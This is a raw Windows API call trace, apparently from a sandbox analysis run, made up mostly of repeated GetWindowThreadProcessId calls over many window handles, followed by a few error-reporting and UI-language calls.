	[0447.026] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xf9c
	[0447.026] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xf48
	[0447.026] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xe40
	[0447.026] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xecc
	[0447.026] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xeb8
	[0447.026] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xe80
	[0447.026] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xe98
	[0447.026] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xe60
	[0447.027] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xee4
	[0447.027] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xf00
	[0447.027] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xdf0
	[0447.027] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xe1c
	[0447.027] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xdd0
	[0447.027] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xd94
	[0447.027] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xd74
	[0447.027] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xd00
	[0447.027] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xcd8
	[0447.027] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xc84
	[0447.027] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xca4
	[0447.028] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xc64
	[0447.028] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xc24
	[0447.028] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xb84
	[0447.028] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xbac
	[0447.028] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x384
	[0447.028] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xab8
	[0447.028] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x33c
	[0447.028] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xa44
	[0447.028] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xa64
	[0447.028] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x8a8
	[0447.029] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xaf0
	[0447.029] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x88c
	[0447.029] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xb04
	[0447.029] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x910
	[0447.029] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x230
	[0447.029] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xac0
	[0447.029] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xab4
	[0447.029] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xaac
	[0447.029] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x3d0
	[0447.029] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x978
	[0447.030] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xa7c
	[0447.030] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x59c
	[0447.030] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xa88
	[0447.030] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xa6c
	[0447.030] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xa68
	[0447.030] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x9f8
	[0447.030] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xa04
	[0447.030] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x924
	[0447.030] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x8dc
	[0447.030] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x7dc
	[0447.030] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x768
	[0447.031] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x764
	[0447.031] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x820
	[0447.031] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x810
	[0447.031] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x794
	[0447.031] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x83c
	[0447.031] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x7ac
	[0447.031] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xb44
	[0447.031] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xb5c
	[0447.031] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x838
	[0447.031] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x4d0
	[0447.031] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x4d0
	[0447.032] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x4d0
	[0447.032] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x4d0
	[0447.032] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x4d0
	[0447.032] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x4d0
	[0447.032] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x4d0
	[0447.032] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x4d0
	[0447.032] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x818
	[0447.032] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x5b8
	[0447.032] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x494
	[0447.032] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x1ec
	[0447.033] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x440
	[0447.033] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x7e8
	[0447.033] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x730
	[0447.033] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x2c8
	[0447.033] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x31c
	[0447.033] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x330
	[0447.033] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x128
	[0447.033] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x5c8
	[0447.033] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x6f8
	[0447.033] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x358
	[0447.033] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x73c
	[0447.034] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xb0
	[0447.034] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x250
	[0447.034] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x240
	[0447.034] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x790
	[0447.034] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x61c
	[0447.034] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x540
	[0447.034] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x538
	[0447.034] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x568
	[0447.034] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x538
	[0447.034] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x568
	[0447.035] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x538
	[0447.035] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x540
	[0447.035] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x540
	[0447.035] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x57c
	[0447.035] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x460
	[0447.035] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x554
	[0447.035] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x4d0
	[0447.035] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x528
	[0447.035] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x4d0
	[0447.035] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x4d0
	[0447.035] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x4d0
	[0447.036] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x79c
	[0447.036] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x4d0
	[0447.036] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x4e0
	[0447.036] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x4d0
	[0447.036] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x460
	[0447.036] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x460
	[0447.036] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x44c
	[0447.036] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x778
	[0447.036] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x460
	[0447.037] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x558
	[0447.037] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x4d0
	[0447.037] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x4d0
	[0447.037] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x15bc
	[0447.037] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x15a0
	[0447.037] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x159c
	[0447.037] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x1598
	[0447.037] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x1594
	[0447.037] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x1590
	[0447.037] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x158c
	[0447.038] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x1588
	[0447.038] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x1584
	[0447.038] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x1580
	[0447.038] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x157c
	[0447.038] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x1488
	[0447.038] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x1404
	[0447.038] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x11b8
	[0447.038] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xbd4
	[0447.038] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xe0c
	[0447.038] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xd30
	[0447.039] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xe70
	[0447.039] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x13b8
	[0447.039] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xe20
	[0447.039] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xe2c
	[0447.039] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xe00
	[0447.039] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xe04
	[0447.039] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xc94
	[0447.039] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x13b0
	[0447.039] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x13ac
	[0447.040] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x13a8
	[0447.040] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x1374
	[0447.040] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x132c
	[0447.040] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x1328
	[0447.040] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x12d0
	[0447.040] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x12cc
	[0447.040] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x12c8
	[0447.040] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x1290
	[0447.040] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x1218
	[0447.040] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x1214
	[0447.041] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x11ec
	[0447.041] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x11e8
	[0447.041] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x11cc
	[0447.041] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x1140
	[0447.041] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xe6c
	[0447.041] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x6e8
	[0447.041] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xc6c
	[0447.041] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xf94
	[0447.041] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xffc
	[0447.041] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xf74
	[0447.041] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xf08
	[0447.042] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xf0c
	[0447.042] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xed8
	[0447.042] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xe90
	[0447.042] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xea8
	[0447.042] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xfa8
	[0447.042] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xfbc
	[0447.042] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xfb8
	[0447.042] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xfb4
	[0447.042] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xfb0
	[0447.042] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xfac
	[0447.042] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xfc0
	[0447.042] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xfd0
	[0447.043] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xf88
	[0447.043] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xf84
	[0447.043] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xf80
	[0447.043] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xde0
	[0447.043] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xddc
	[0447.043] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xdd8
	[0447.043] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xd34
	[0447.043] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xd10
	[0447.043] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xd0c
	[0447.043] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xc9c
	[0447.043] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xc74
	[0447.043] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xc1c
	[0447.044] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xc08
	[0447.044] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xabc
	[0447.044] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x24c
	[0447.044] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xbb0
	[0447.044] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xbfc
	[0447.044] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xb10
	[0447.044] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x374
	[0447.044] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x368
	[0447.044] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xb28
	[0447.044] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xae8
	[0447.045] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xb14
	[0447.045] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0x95c
	[0447.045] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x16da00 | out: lpdwProcessId=0x16da00) returned 0xa8c
	[0447.049] WerSetFlags () returned 0x0
	[0447.057] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0447.298] CoTaskMemFree (pv=0x0) 
	[0447.299] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x16dd68, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x16dd60 | out: pulNumLanguages=0x16dd68, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x16dd60) returned 1
